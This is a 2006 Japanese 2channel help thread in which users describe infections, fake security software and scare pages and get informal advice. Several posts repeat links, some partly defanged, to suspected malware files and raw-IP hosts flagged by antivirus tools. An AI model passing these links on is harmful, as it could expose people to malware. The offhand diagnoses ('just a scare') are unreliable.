694 :名無しさん@お腹いっぱい。:2006/04/15(土) 19:19:58
>>693
>うちはパソコン70台くらいの中規模ネットの会社なんだけど

これでそんなことも知らないのか?

業務用ならいくらでもある。
経営者うんぬんよりおまいの勉強が先じゃないのか?

695 :名無しさん@お腹いっぱい。:2006/04/15(土) 19:22:11
私は、IT管理者が必要ということが分からない
経営者がいる会社の、
一般社員(本来パソコンともあまり縁がない)です。
恐ろしい事に、当社にはIT管理者がいないのです!

696 :名無しさん@お腹いっぱい。:2006/04/15(土) 19:23:27
業務用ならあるの?
高い?
とりあえずサイトとか教えてくれない?
社長にこれを見ろと言っても、無駄だろうけど。
一応、私は知りたい。

697 :653:2006/04/15(土) 19:23:33
ありがとうございました。
危機感を煽って危ないソフトをインストールさせるということですか。
感染はしていないということでいいんですよね。

698 :名無しさん@お腹いっぱい。:2006/04/15(土) 19:25:03
それなら方法やソフト名が解ったところで実行不可能と違うか?

699 :名無しさん@お腹いっぱい。:2006/04/15(土) 19:27:24
>>696
おまいが書いた文の中にキーワードが溢れている。

    グ グ れ !!

700 :名無しさん@お腹いっぱい。:2006/04/15(土) 19:28:03
http://itpro.nikkeibp.co.jp/article/NEWS/20060403/234416/
アークンとか?

701 :名無しさん@お腹いっぱい。:2006/04/15(土) 19:34:42
そういえば、当社はウィルスバスター2005が入っている。
http://internet.watch.impress.co.jp/cda/news/2006/03/02/11088.html
こういうのを、買い足せばいいの?
4/5発売だって。
IT専門家じゃないから、そんなに情報早くないよ。
あまり、責めないでくれ、諸君。

702 :名無しさん@お腹いっぱい。:2006/04/15(土) 19:39:22
>>701
その日本語何とかならない?なんかむかつくんだけどw

703 :名無しさん@お腹いっぱい。:2006/04/15(土) 20:38:20
さきほどニュー速板で(眠くてぼけ〜としてたら)以下のウイルスを
踏んでしまったアホです。

ウイルスにつき注意→ tp://up.nm78.com/data/up000000.jpg.kintama.exe


セキュリティソフトはノートンインターネットセキュリティー(常に最新のものに自動更新される)
を入れていて、PCも特に異常は見られません。
ノートンでブロックされたと理解しても大丈夫ですか?
ここだけはチェックしろ!とかの項目があれば教えてください。

704 :名無しさん@お腹いっぱい。:2006/04/15(土) 20:50:34
>>703
アダルトサイトリンク集に飛ぶだけみたいだけど・・・?
URL削ってロダを観たけどそんなファイルない

705 :名無しさん@お腹いっぱい。:2006/04/15(土) 21:00:12
>>704
ニュー速のここの板の272に張ってあったやつで、その後のレスに「いちごきんたま
亜種」とありますが・・・。確かにアダルトサイトリンク集に飛びますが、じゃあウイルス
は仕込まれていないのかなぁ?でもkintama.exe ってついてるし・・・。


tp://live22x.2ch.net/test/read.cgi/news/1145084569/l50

706 :704:2006/04/15(土) 21:57:23
これ時々見かける
多分、ビビらせる目的だよ

707 :名無しさん@お腹いっぱい。:2006/04/15(土) 22:01:14
>>703
404にしないでそのサイトに飛ばしているだけ

708 :名無しさん@お腹いっぱい。:2006/04/15(土) 22:09:51
あっ、じゃあ気にしなくていいんですね。
ありがとうございました。

709 :名無しさん@お腹いっぱい。:2006/04/15(土) 22:35:56
>>690
つttp://service1.symantec.com/SUPPORT/INTER/nisjapanesekb.nsf/jp_docid/20021028152516947
しっかりぐぐれ

710 :ヵな:2006/04/15(土) 22:42:43
いきなりですいませんが、ブラックウォームに
引っかかっちゃってWin AntiVirus Pro 2006を
ダウンロードしてしまったんです。。。
けどその後、再起動を繰り返して
「アプリケーションの削除と変更」ってトコで
どぉにかァンインストールできました。
ダウンロード後にぁったアイコン(っていうのヵナ??)は
消えたんですけど、これでもぅ安心していいんですか??
今ウイルスバスター2006でウイルス/スパイウェア検索を
やっていて、この検索で何も見つからなかったら
安心してぃぃんでしょうか??
誰か是非教えてください!!!!!

711 :名無しさん@お腹いっぱい。:2006/04/15(土) 22:47:34
>>710
http://pc8.2ch.net/test/read.cgi/sec/1143972325/
http://pc8.2ch.net/test/read.cgi/sec/1134850825/

これを全部嫁

712 :名無しさん@お腹いっぱい。:2006/04/15(土) 22:47:45
何度も宣伝広告のウィンドウがでてくるんですけど(閉じてもまた出てくる感じで・・・
この場合どうすればいいですか?
一応、スキャンしたけど修復されないのが3つほどあった。。。

713 :名無しさん@お腹いっぱい。:2006/04/15(土) 23:10:34
突然ですみません。
昨日ウイルスに感染したようで、駆除することは出来たのですが右上の「閉じる」や
「最大化」「最小化」などの記号が別の文字になってしまいました。
例えば閉じるが「r」になっていたり最大化が「0」になっています。
どうすれば直るのか教えてください。お願いします。

714 :名無しさん@お腹いっぱい。:2006/04/16(日) 00:01:40
>>713
「フォントキャッシュの破損」でググれ

715 :名無しさん@お腹いっぱい。:2006/04/16(日) 00:22:05
>>679
winhoundだけ削除できません。メモリ上に・・・と出て、再起動しても削除できませんでした。
下の方法でも解決できませんでした。
http://oshiete1.goo.ne.jp/kotaeru.php3?q=1836836

ハイジャックのスキャン表示にはwinhoundはありません。
確かにスキャンであるのですが・・・
どなたかアドバイスいただけませんか?
どなたかアドバイスいただけませんか?


716 :713:2006/04/16(日) 00:55:52
>>714
直りました、ありがとうございます。

717 :名無しさん@お腹いっぱい。:2006/04/16(日) 01:44:54
これって「苺キンタマウイルス」説と「ただの脅し」説があるけど、
詳しい人判定して!!  


ウイルス(かも?)注意
ttp://up.nm78.com/data/up000000.jpg.kintama.exe


718 :名無しさん@お腹いっぱい。:2006/04/16(日) 01:53:06
シマンテックのセキュリティ警告
ウイルス定義が最新ではありません
って奴が今も飛び出てくるんだけど、これ出てこないようにできませんか?
なんか買わなきゃいけないの?

719 :名無しさん@お腹いっぱい。:2006/04/16(日) 02:02:26
>>717
ただの脅し

720 :名無しさん@お腹いっぱい。:2006/04/16(日) 02:42:07
【使用OS】 win xp home edition
【WindowsUpdateしてるか】しています
【AntiVirusは何を使っているか】 Norton Internet Security 2006
【ちゃんとUpdateしてるか】 最新になっています。
【スキャンした結果(ウイルス名・発見場所)】 異常なしでした
【別のオンラインスキャンしたならその結果は】 トレンドマイクロオンラインスキャンで異常無しです。
【症状を具体的に、分かる限りすべて書く】シマンテック社の電子メールプロキシで
「電子メールメッセージ (送信先は xxx、件名は xxx) を送信できませんでした。メールサーバーに対する接続が中断したためです。
電子メールクライアントを開いてメッセージ送信フォルダからメッセージを再送してください。」
というメッセージが表示されます(690さんと同じ状況です)。
709さんのリンクにもあるように、Outlookの設定をいじったりNortonの発信メールスキャンを無効にしていますが、
メールを送ってもいないのにこのメッセージが表示されます。
10数個連続でこのメッセージが出たりしてるので、勝手にメールを送る動作をしているのだと思います。
それと、関係あるのか分かりませんがNorton AntiSpamの許可リストに知らないメールアドレスが200個ほど登録されていて、
削除してもすぐ復活してしまいます。
【何をしたらそんなことになったのか】分かりません。
【これまでにとった措置】 ウイルススキャン
【その他の質問】

対処方法等分かる方がいましたら教えて下さい。

721 :名無しさん@お腹いっぱい。:2006/04/16(日) 03:59:42
そういったことはノートンスレで聞いた方がいいって。

722 :名無しさん@お腹いっぱい。:2006/04/16(日) 04:18:29
さっき携帯でここのサイトを踏んだらウィルス警告、あなたの携帯のすべての情報が流れましたと出たんですがホントにウィルスなんでしょうか?

もしそうなら対処の仕方など教えてください。

ttp://www.ihot.jp/?3channel2

723 :注意!:2006/04/16(日) 04:21:34
>>722
すいません、hを抜いたんですかリンクになっちゃいました…。
どうか鑑定してくださるかた以外は踏まないでください!!



724 :690:2006/04/16(日) 05:51:11
>720
ウィルスバスターのオンラインスキャンで診断したところ、トロイの木馬でした(TROJ_RANKY.KC)
・感染活動を行わない不正プログラムですのでウイルスバスターなどウイルス対策製品の機能で「駆除」処理は行えません
とあるので、手動でファイルを削除しました。(スキャンに引っかからなかったのも感染活動を行わない不正プログラムだから?)
様子見をしていますが、今のところ特に問題ないようです。
私はレジストリの使い方がよく分からなかったのでローカルディスク→WINDOWS→updateのフォルダ→中身の一つだけあるプログラム(?)を完全に削除
を行いましたが正式な方法で解決するほうが無難かと思います。

725 :名無しさん@お腹いっぱい。:2006/04/16(日) 05:52:06
>>723
つまりテンプレすら読んでない・・・と。

726 :名無しさん@お腹いっぱい。:2006/04/16(日) 05:58:08
>>722
こんなもん真に受けるな
もし本物でもウイルス名が EICAR test Stringってなってるしね・・・

727 :名無しさん@お腹いっぱい。:2006/04/16(日) 06:57:09
>>715
せーふもーど
だめなら添付されているDiscでリカバリ
または新規購入OSでクリーンインストール
>>720
あちらで答えてる 以降マルチ放置


728 :名無しさん@お腹いっぱい。:2006/04/16(日) 15:00:11
会社でウィルスバスターを入れているのですが、
ウィルス感染してます(隔離しました)と出ます。
ウィルスの種類を調べると、Cokkie(綴りは自信ない)なんとか、
というのが、1台のパソコンに何十個も入っています。
これってウィルス?
害のないもの?

729 :名無しさん@お腹いっぱい。:2006/04/16(日) 15:12:08
ただのクッキーじゃないのか?

730 :名無しさん@お腹いっぱい。:2006/04/16(日) 17:53:55
>>728
それはあんたのPCか?
それとも他の人のPCか?
まあどっちにしてもろくなところを見てないってこった
(まあこれは本人の自由と言うほかないが)

たぶん正確にはスパイウエア、アドウエアという類
ほとんどのものは他には感染はしないからウイルスとは意味が違う

731 :728:2006/04/16(日) 20:39:23
会社の部署内のパソコンです。
パソコンに詳しい人がいないので、
私も詳しくないですが、ウィルスバスターの検出結果を見てみたのです。
隔離されているもののトロイの木馬も来てるし。
やっぱ、そのパソコンのやつは、会社のパソコンで
アダルトサイトとか見てるってこと?
明日、会社に行ったら叱ってやらねば。
アダルトサイト見るのは構わんが、変なウィルス持ち込まれたら困る。

732 :名無しさん@お腹いっぱい。:2006/04/16(日) 20:51:08
>>731
勝手にアダルトサイトと決め付けてかかるのはイクナイ
他にもいろんなジャンルがある
人権侵害につながるぞw

733 :728:2006/04/16(日) 20:54:34
仕事で調べものするようなインターネットの使い方で
ウィルスバスターでひっかかるようなCokkieがある?
会社中のパソコンにウィルスバスターを入れてるのに、
トロイの木馬とか、ウィルスがちょくちょく入ってるのもおかしいし。


734 :名無しさん@お腹いっぱい。:2006/04/16(日) 21:05:20
>>733
どこぞの公社がやられたのがあったな
改ざんされてて見ただけで感染したり
どこぞに飛ばされたり・・・
今時ないかも知れんが、やっぱり一概に
決め付けるのもマズイかも?
ひとごとだからいいけどね(w

735 :名無しさん@お腹いっぱい。:2006/04/16(日) 21:09:29
>>733
つうか、本当に調べたいなら
そのPCの履歴とかネット接続履歴を調べればすぐ判る
(あんたが判る立場にいればの話だがw)

736 :728:2006/04/16(日) 22:59:18
そいつのパソコンを見るのは、見づらいな。
サーバーにある、ウィルスバスターの管理画面の方が、
私の席のパソコンからも見られるので、見やすい。
けど、サーバーではこれといった管理はしてないので、
そいつのパソコンの接続履歴は分からないかな・・。

737 :名無しさん@お腹いっぱい。:2006/04/16(日) 23:52:08
助けて下さい。
アダルトサイトを見てたら、サイトが×65くらいでてきました。
そうしたらノートンが作動したみたいなんですが、いつのまにか無効になっていました。そしたらブレイブセントリーセキュリティセンターっていうアイコンが出てきました。
スパイウェアに感染したというような事が英語で書いてあるんですが、よくわかりません。
それと仮想メモリが少なくなって来ていますという表示がでます。
どうすればいいのか、わかりません。

738 :名無しさん@お腹いっぱい。:2006/04/17(月) 00:20:04
>>737
とりあえずウイルススキャンとスパイウェアを削除したら?

739 :名無しさん@お腹いっぱい。:2006/04/17(月) 04:19:51
>>737
そういうデタラメなサイトに惑わされるお前のあたまの改造が一番先だ!

740 :名無しさん@お腹いっぱい。:2006/04/17(月) 07:42:44
>>737
URL教えてくれ。踏んでみたいw

741 :名無しさん@お腹いっぱい。:2006/04/17(月) 12:54:47
Download.Trojanが消しても出てきます
【使用OS】 XP
【WindowsUpdateしてるか】 行っています
【AntiVirusは何を使っているか】 ノートンアンチウィルス2006
【ちゃんとUpdateしてるか】 行っています
【スキャンした結果(ウイルス名・発見場所)】 C:\Documents and Settings\***\Local Settings\Temporary Internet Files
【別のオンラインスキャンしたならその結果は】 行ってません
【症状を具体的に、分かる限りすべて書く】 IEなどを開くとノートンに引っかかります
【何をしたらそんなことになったのか】 ZIPファイルを開いたら感染しました。
【これまでにとった措置】 ノートンでの感染ファイル削除、セーフモード起動でのスキャンとemporary Internet Filesの削除
【その他の質問】

742 :名無しさん@お腹いっぱい。:2006/04/17(月) 19:16:44
ウイルススキャンにどれぐらいかかりますか?

743 :名無しさん@お腹いっぱい。:2006/04/17(月) 19:27:30
>>742
HDDの容量やファイル数、PCのスペック、
スキャンソフトなどによって違う。
一概には言えない。

744 :名無しさん@お腹いっぱい。:2006/04/17(月) 19:42:33
【使用OS】WinXP Home SP2
【WindowsUpdateしてるか】してません
【AntiVirusは何を使っているか】ノートン2006
【ちゃんとUpdateしてるか】してます
【スキャンした結果(ウイルス名・発見場所)】できません
【症状を具体的に、分かる限りすべて書く】
PCを起動してデスクトップの画面になったらWindows systemと書かれたウィンドウがたくさん出てきました。
マウスポインタにあわせるようにハエやゴキブリの画像が動きます。ソフトが起動できません。
なんどか再起動してウィンドウがでなくなり、ノートンがウイルス定義の更新とシステム完全スキャンをすると言ったので
するようにして、気持ち悪いのでディスプレイを消していたのですが、つけてみたらcドライブのフォーマットがはじまっていました。
なのであせって電源ボタンを押して強制終了しました。
【何をしたらそんなことになったのか】
winnyでダウンロードした圧縮ファイルの中の自己解凍らしきexeファイルを実行しました。
そのときは解凍に失敗しましたと出てそのままでしたが、今日PCを起動したら感染を確認しました。
【これまでにとった措置】
ソフトが起動しないのでなにもできません。
【その他の質問】
フォーマットの途中で電源を切ってしまいましたが、もうなおすことはできないのでしょうか。
だめならば今後の対応の仕方(OSの再インストールなど)を教えてください。

745 :名無しさん@お腹いっぱい。:2006/04/17(月) 19:45:29
>>744
クリーンインストールする。
HDDがダメになってたら、新しいHDD載せてインストール

746 :744:2006/04/17(月) 19:59:05
セーフモードで起動したらノートンが起動できたので完全スキャンをしてみます。
フォーマットの途中で強制終了しましたが、この場合データは一部消えてしまったのでしょうか?

747 :名無しさん@お腹いっぱい。:2006/04/17(月) 20:05:49
>>746
本当にフォーマットが始まっていたのか?
起動できる時点で疑問を感じるんだが。

748 :名無しさん@お腹いっぱい。:2006/04/17(月) 20:14:24
ディスプレイをつけたときは、セーフモードで起動するときのような真っ黒な画面にフォーマットしますか?とでていて勝手にYesになっていました。
混乱してキーをおしていたらそのすぐあとに消去中と思われるパーセント表示がでました
20%か30%あたりで電源をきりました。しかし起動できるということはフォーマットはされていないと考えていいのでしょうか?

749 :名無しさん@お腹いっぱい。:2006/04/17(月) 20:14:30
>>744は本当のフォーマット画面も知らないで
騙しのインジケータに欺かれた悪寒www

750 :744:2006/04/17(月) 20:18:33
>>749
まじですか・・・。騙しならよかったです。それならノートンがウイルスを検出するのを待ってればいいですかね?

751 :名無しさん@お腹いっぱい。:2006/04/17(月) 20:18:39
結局、>>744はおろおろしてるだけ
セーフモードで起動するのか
通常起動するのか、スタートメニューが出るのかでないのか?
タスクバーが出るのか出ないのかすら答えられないw

752 :名無しさん@お腹いっぱい。:2006/04/17(月) 20:21:10
>>750
そりゃ、わからんよ
あんたのPCが何のウイルスに感染したのか?わからんし

っていうより、EXEファイルならウイルスじゃなくっても
何でも出来てしまうんだよwww
それを知らないで実行する方が愚か者!!!ってこと

753 :744:2006/04/17(月) 20:24:22
>>751
申し訳ありません。
通常起動すると感染が確認できます。キーボードからスタートメニューがでます。
そこからソフトを起動するとタスクバーが動きます。ソフトのウインドウはでません
セーフモードで起動するととくに問題はありません。なので今セーフモードでノートンのウイルススキャンをしています。

754 :名無しさん@お腹いっぱい。:2006/04/17(月) 20:25:21
>>744
Updateくらい自動にしとけよ
ノートン アンチウイルスなのかインターネットセキュリティなのかも告知していない
アンチウイルスだけなら即刻NIS2006に換えるべき
その前になんでも実行し、後でおろおろする性格をどうにかすべき

755 :744:2006/04/17(月) 20:28:27
>>754
ノートンはインターネットセキュリティです。これからはもっときちんと自己防衛に努めます。

お騒がせしてすみませんでした。

756 :名無しさん@お腹いっぱい。:2006/04/17(月) 20:31:41
>>744
今のところ、ウイルスかどうかわからんが
Winnyで変なソフトを拾ってくるのが大間違いw それは全て自己責任!

それと、今後のために言っておく
ノートンとかぶらない、spybot(基本的に無料、寄付はご自由に)などの
アンチスパイウエア、アドウエアソフト(いろいろある)も組み込んでおけ
決して怪しいアンチソフトは入れるな・・・と言っても入れるかもしれないが


これ全て親切で言っておるのでよろしくw


757 :名無しさん@お腹いっぱい。:2006/04/17(月) 20:33:35
>>755
自己防衛に努めるならWinnyを止めるのが一番じゃまいか?

758 :名無しさん@お腹いっぱい。:2006/04/17(月) 20:33:41
タグを使ってホームページを作成してて保存したら「トロイの木馬が検出されました」って出てきて、削除してからウイルススキャンしました
スキャンが終わってから再び同じように保存したらまた「トロイの木馬が検出されました」と出てきました
それでまたウイルススキャンをしているのですが
何でまた検出されるのですか?教えてください

759 :名無しさん@お腹いっぱい。:2006/04/17(月) 20:35:42
>>757
それを言いたいのはもちろん判る!
漏れもいいたいw
しかし、それがやめられないんだろうね〜 もう中毒なんだよ>>744にとってwww

760 :名無しさん@お腹いっぱい。:2006/04/17(月) 20:38:04
>>758
なんのソフトを使って、どこにうpしたんだ? 話はそれからだ!

単にタグを括ってないんじゃまいかと思われ<初心者にはありがちw

761 :758:2006/04/17(月) 20:42:13
>>760
いや、テキストドキュメントでjavascriptを使って作成してて、まだWEBには公開してません
USBフラッシュメモリーに保存したらウイルスが検出されたんです

762 :名無しさん@お腹いっぱい。:2006/04/17(月) 20:48:16
>>758
やはり単純にスプリプトエラーだろうな、今まで何もないとするとだけど・・・
判らないうちはチェックできるソフトを使うのがよろし

2ちゃんでもパールとかjavaのほんちょっとのスクリプトだけ貼り付けてる香具師がいる
それで自分のPCでウイルスエラーでまくりってことがよくあること!


763 :758:2006/04/17(月) 20:57:34
頭混乱してきた
スクリプトエラーって何ですか?

764 :名無しさん@お腹いっぱい。:2006/04/17(月) 21:04:41
>>763
↓こちらへどうぞw
ttp://pc8.2ch.net/php/

765 :名無しさん@お腹いっぱい。:2006/04/17(月) 21:05:59
758はパクリ屋でOK?

766 :758:2006/04/17(月) 21:36:07
まさか、他のソフトで作ったデータ類も保存したときにウイルスに感染するというのはないですよね?

767 :名無しさん@お腹いっぱい。:2006/04/17(月) 22:04:04
最近PCが不調っぽいので調べたら感染してたようです
【使用OS】 Win2k SP4
【WindowsUpdateしてるか】 してますよ。
【AntiVirusは何を使っているか】 WinFixer 2005
【ちゃんとUpdateしてるか】 もちろん。
【スキャンした結果(ウイルス名・発見場所)】 spyware-cookie
【別のオンラインスキャンしたならその結果は】 c:\program files\winfixerフォルダ内から多数
【症状を具体的に、分かる限りすべて書く】 winfixerというセキュリティソフトを入れてからPCが不調に
【何をしたらそんなことになったのか】 「エラーが見つかった」レジストリやシステムの有り得るエラーで
ご利用のパソコンは機能が悪くなってブロックになる。というメッセージが出てきた。
【これまでにとった措置】 パソコンが壊れるのはどうしても避けなければならず、NOD32を消してWinFixer 2005を入れた
【その他の質問】 オンラインスキャンでWinFixerが検出されるのは誤検出ですか?

768 :名無しさん@お腹いっぱい。:2006/04/17(月) 22:06:36
>>767
つりですか?

769 :名無しさん@お腹いっぱい。:2006/04/17(月) 22:24:47
>>767
>>663以降を一読することをお勧めする

770 :名無しさん@お腹いっぱい。:2006/04/17(月) 23:05:55
>>767
ttp://www.higaitaisaku.com/removewinfixer.html
この辺見て対応してみて。

771 :名無しさん@お腹いっぱい。:2006/04/17(月) 23:20:14
2号登場

772 :名無しさん@お腹いっぱい。:2006/04/17(月) 23:30:43
100%釣りじゃん。


773 :名無しさん@お腹いっぱい。:2006/04/17(月) 23:32:06
>NOD32を消してWinFixer 2005を入れた


激しくワロタw

774 :名無しさん@お腹いっぱい。:2006/04/17(月) 23:59:16
>>773
それとほぼ同じネタ、上の方にもあったよ。
よって767はパク(ry

775 :名無しさん@お腹いっぱい。:2006/04/18(火) 00:01:49
ヨンハ

776 :名無しさん@お腹いっぱい。:2006/04/18(火) 01:29:22
マカフィーの警告音がなり
トロイの木馬がに感染しました!となりました。
そのファイルごと削除しましたが
それでもやばいのでしょうか。

ちんぷんかんぷんで
DLとかも全然しないしこないだ怪しいのを踏んだのがいけなかったのか
トロイの木馬に感染しているとすればどういう不都合が生じるのでしょうか
あまりPCをつないでないライトユーザーなのですが
とりあえず今からネットつながなければ被害はおこらないのでしょうか


777 :名無しさん@お腹いっぱい。:2006/04/18(火) 01:32:46
マカフィーが防いでくれたんなら問題ないでしょ

778 :名無しさん@お腹いっぱい。:2006/04/18(火) 01:33:33
>>776
感染したの?
感染する前に発見したの?
何というトロイだったか記録残ってる?

779 :776:2006/04/18(火) 01:53:47
>>777
感染しました、というポップウィンドウが出ました。なので感染しているのではなかろうか

>>778
上記の通りです。+記録?というのがはてはてわかりません。
ごめんなさい。
マカフィーがいつも右下でポポンと音をたててなにやら更新しろとかいう
お知らせをだしてるのですがそれがいつもと違うなと思ってみたら
トロイの木馬に感染しています ファイルがどうたらこーたら
と書いてあり、駆除しますか?隔離しますか?のボタンは無効。
どうせたいしたファイルないので最後の削除しますか?をおしたら
削除したもようです。
続けてスキャンをしましたがファイル数が多すぎて途中で断念。
コワイヨーすみません。ほんっとチンぷんカンぷんです…


780 :776:2006/04/18(火) 01:54:33
>>778
感染する前にわかるものなのですね。
多分マカさんは「トロイの木馬に感染している、」という文言を使って
私に知らせてきました。
このファイルだよーと指定してあったので私はあわてて削除してしまいました。
今のところ立ち上げと終了に問題はないのですが、、
いつもなる音で、PCがなにやら処理する「ごろごろ」という音ありますよね
あれが沢山なっているような、とても被害妄想で冷静な判断ができてません

ちなみに仕事が超多忙なのですが落ち着いて駆除方法調べるまで使わなければ
問題ないでしょうか…
このpcは使わなくても支障ありません。
ネットをつながなければ例えば感染していたとしても
これ以上何か問題はおこりませんか?つなぐたびに情報がもれたりとかだったら
速攻プッチリきります。

そもそもどういう情報が流れるのでしょうか
過去にこのPCから行ったクレジット決済とか?


781 :776:2006/04/18(火) 01:57:35
ううう↑質問ばかりすんまっせん。
他の板ではこういうやつをさめためで
クールに見ている私なのに。
状況が変わればこの始末。肝小さい自分がなさけねえですorz



他の人ってどういう形で感染した!ってわかるんだろう

782 :名無しさん@お腹いっぱい。:2006/04/18(火) 02:01:51
yahooメールに画像添付してウィルススキャンも終わり、終了をクリックすると「ページを表示できません」になります
今日いきなりなったんでびっくりしました
ウィルスとかと関係あるのでしょうか?

ノートン先生は入れてますが更新していません
Windowsのupdateもしていません

783 :名無しさん@お腹いっぱい。:2006/04/18(火) 09:08:30
>>780
うちはマカフィーじゃないから良く分からんけど、

感染しているというのはPCじゃなくてファイルのことでは?
感染しているファイルを見つけたから、PCに影響が出る前に
どうにかしろと警告が出てるような気がするけど。

あと何かしらウイルス等を見つけたり対応するとログが残って
いつどんなウイスルやトロイを見つけてどんな対応したか
分かると思うけど。

気になるなら全体をマカフィーでスキャンにかけてみれば?


784 :名無しさん@お腹いっぱい。:2006/04/18(火) 13:54:38
>>782
まずは「更新・Update」してからかと

785 :名無しさん@お腹いっぱい。:2006/04/18(火) 19:57:58
なんか、変なサイト踏んだ後に「Network Monter」っていうソフトがインストールされたみたいなんですけど、これって何ですか?

起動に5分ほどかかったり、ネット接続時に突然不気味な広告が出てきたりするんですけど…

786 :名無しさん@お腹いっぱい。:2006/04/18(火) 20:42:49
>>785
これかな?
つttp://www.symantec.com/region/jp/avcenter/venc/data/jp-spyware.netmonitor.html

787 :785:2006/04/19(水) 12:07:35
↓の画像ファイルを開いたときに感染したようです。
tp://210.153.19.226/cgi-bin/pa0717/img/23479.gif

いろいろ検索してみたら「WinFixer」やらなんやらとも関係しているみたいです。


788 :名無しさん@お腹いっぱい。:2006/04/19(水) 13:00:41
>>787
WinFixerが原因のものはよくあるので
同名で検索しましょう

789 :785:2006/04/19(水) 18:37:25
>>788
「Spybot」で駆除できますか?

790 :名無しさん@お腹いっぱい。:2006/04/19(水) 20:08:34
無料でスパイウエアを検出してくれるサイトありますか?

791 :名無しさん@お腹いっぱい。:2006/04/19(水) 20:18:49
>>790
マルチ&スレ違い

792 :名無しさん@お腹いっぱい。:2006/04/19(水) 20:46:33
【使用OS】 WIN MX
【WindowsUpdateしてるか】 YES
【AntiVirusは何を使っているか】 CWShredder
【ちゃんとUpdateしてるか】 YES
【スキャンした結果(ウイルス名・発見場所)】 見つからない
【別のオンラインスキャンしたならその結果は】 トレンドマイクロでExponny検出
【症状を具体的に、分かる限りすべて書く】 起動時に「○○にアクセスできません。
アクセスが拒否されました。」というエラー文が出てくる。
【何をしたらそんなことになったのか】 正直、winmxのサイトで落としたファイルが原因だと思う。
しかし、落としたファイルをCWShredderで調べてもウィルスが見つからなかったのに。なんで?
【これまでにとった措置】 落としたファイルを削除&オンラインスキャンで見つかったファイルも削除
(消えないファイルはセーフモードから)
【その他の質問】 CWShredderというセキュリティソフトは、ウィルスを検出してくれるんじゃ無かったのか?

793 :名無しさん@お腹いっぱい。:2006/04/19(水) 21:04:10
【使用OS】 WIN MX
【AntiVirusは何を使っているか】 CWShredder

^^

794 :名無しさん@お腹いっぱい。:2006/04/19(水) 21:09:12
JS/Exploit-scriptについて教えてください
ググッたりマカフィーで調べたのですがよくわかりません
お願いします

795 :名無しさん@お腹いっぱい。:2006/04/19(水) 21:13:32
>>794
ttp://www.mcafee.com/japan/security/exploit-script.asp


796 :名無しさん@お腹いっぱい。:2006/04/19(水) 21:17:50
>>792
ttp://www.symantec.com/region/jp/avcenter/venc/data/jp-trojan.exponny.html


797 :名無しさん@お腹いっぱい。:2006/04/19(水) 21:44:24
【使用OS】 2000 sp4
【WindowsUpdateしてるか】 してる
【AntiVirusは何を使っているか】 avast
【ちゃんとUpdateしてるか】 はい
【症状を具体的に、分かる限りすべて書く】
unspypcとかいうソフトがいつの間にかインストールされてたので削除しました。
Ad-Aware seでチェックし、いろいろと消しました。セーフモード後も実行。
マイクロトレンドのオンラインウィルスチェックを実行し、ウィルスを削除
その後
http://85.255.113.84/users/smell/web/files/encodex.jpg
http://85.255.115.187/users/fill/web/images/logo_big.jpg
http://85.255.115.187/users/fill/web/images/sphlp32.jpg

こんな感じでずっとアドウェアを発見しました、トロイを発見しましたと定期的に出続けます。
ブロックをしてくれてはいるようなのですが、根本的に消したい場合はどうしたら良いのでしょう?
当然ながらネットにつないでないときはでません。

798 :名無しさん@お腹いっぱい。:2006/04/19(水) 22:05:07
>>797
レジストリの修復とかやった方が良いのでは。

799 :名無しさん@お腹いっぱい。:2006/04/19(水) 22:48:11
>>798
具体的にどうしたら良いんでしょう?

800 :名無しさん@お腹いっぱい。:2006/04/19(水) 22:55:33
>>799
ttp://www.symantec.com/region/jp/avcenter/venc/data/jp-unspypc.html
これの下のほうに書いてあるけど。

801 :名無しさん@お腹いっぱい。:2006/04/20(木) 05:38:40
だめぽ・・NOD32の体験版を試してみることにした。

802 :名無しさん@お腹いっぱい。:2006/04/20(木) 08:49:43
質問です。
一週間ぶりにパソコンをつないだら、その間に大量のウイルスメール報告が来てました。
プロバイダ元でチェックされてヘッダー以外は削除されていて内容は全く分からないのですが、
これはどういう感じなんでしょうか?
こんな大量は初めてなので詳しく知りたいのですが、誰かがこちらに故意に送ってるのか
誰かが感染してその経由でなのか判断がつきません。
アドレスは、@merumo〜とか@jxk-〜とか何種類も様々です。
こういうのはわりと良くあることですか?ちなみにノートン先生2005を使っています

803 :名無しさん@お腹いっぱい。:2006/04/20(木) 09:32:22
携帯にもトロイ関係のウイルスは存在するのでしょうか?
携帯のウイルスやられたかたいらっしゃいます?

804 :名無しさん@お腹いっぱい。:2006/04/20(木) 09:58:05
>802
無差別送信

805 :名無しさん@お腹いっぱい。:2006/04/20(木) 12:59:32
>>803
テトリスってトロイにやられたことがある。
しばらく仕事にならなかった。

806 :名無しさん@お腹いっぱい。:2006/04/20(木) 13:17:40
俺はトロイの木馬に跨った事がある。

807 :名無しさん@お腹いっぱい。:2006/04/20(木) 14:48:06
俺は三角木馬に跨った事がある。

808 :名無しさん@お腹いっぱい。:2006/04/20(木) 15:51:04
俺は跨られた事がある。

809 :名無しさん@お腹いっぱい。:2006/04/20(木) 15:52:14
おまいは木馬か?

810 :名無しさん@お腹いっぱい。:2006/04/21(金) 09:06:24
教えてください。
SYSPROTECTってウィルスに感染しました。駆除はどの様にしたらいいですか? 何かやって置いた方がいい対策ありますか?

811 :名無しさん@お腹いっぱい。:2006/04/21(金) 09:25:03

                   /\        /\
                   /:::::::ヽ____/::::::::ヽ、
                  丿 ::.__  .:::::::::::::  __  ::::ヽ_
                 / /。 ヽ_ヽv /: /。ヽ  ::::::ヽ
 ~~~~|  | |   |Ο    ./ / ̄ ̄√___丶  ̄ ̄\  ::::|      ■■
  \/  /  |  ~~|~~ ━━| .:::::::::: / / tーーー|ヽ    ...::::: ::|━━━━▼▼
  /\丿  |丿/ | ヽ   .| .:::::.  ..: |    |ヽ        .::|.      ●●
                | :::    | |⊂ニヽ| |      .:::::| \
              / /| :    | |  |:::T::::| !      .::| \ \
             / / \:    ト--^^^^^┤      丿 \\\



812 :名無しさん@お腹いっぱい。:2006/04/21(金) 09:52:20
【使用OS】 Win ME
【WindowsUpdateしてるか】 しています
【AntiVirusは何を使っているか】 avast
【ちゃんとUpdateしてるか】 自動更新してます
【スキャンした結果(ウイルス名・発見場所)】
Win32:Volage-G(Wrm)
発見場所は沢山有ったので覚え切れませんでした。
↓とかにありました。
c:\_RESTORE\ARCHIVE\RG440B86A9.cob

【別のオンラインスキャンしたならその結果は】
していません。
【症状を具体的に、分かる限りすべて書く】
特に気付くような症状はありません。
【何をしたらそんなことになったのか】
普通にインターネットにつないでいました。
【これまでにとった措置】
発見されたワームはチェストに移動。
幾つか移動できないものがありました。
【その他の質問】
avastのホームページでWin32:Volage-G(Wrm)で検索をかけても
